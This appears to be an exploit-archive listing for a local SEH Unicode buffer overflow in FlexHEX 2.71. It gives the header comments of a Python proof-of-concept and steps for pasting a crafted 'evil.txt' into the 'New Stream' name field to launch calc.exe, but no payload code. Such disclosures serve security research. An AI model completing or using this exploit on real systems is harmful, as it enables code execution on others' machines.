Exploits / Vulnerability Discovered : 2019-04-08 |
Type : local |
Platform : windows
This exploit / vulnerability Flexhex 2.71 seh buffer overflow (unicode) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python -w
#
# Exploit Author: Chris Au
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
# Date: 06-04-2019
# Vulnerable Software: FlexHEX 2.71
# Vendor Homepage: http://www.flexhex.com
# Version: 2.71
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
# Tested Windows Windows XP SP3
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open FlexHEX Editor
# 3. select "Stream", click "New Stream..."
# 4. paste contents from clipboard in the "Stream Name:"
# 5. select OK
# 6. calc.exe
#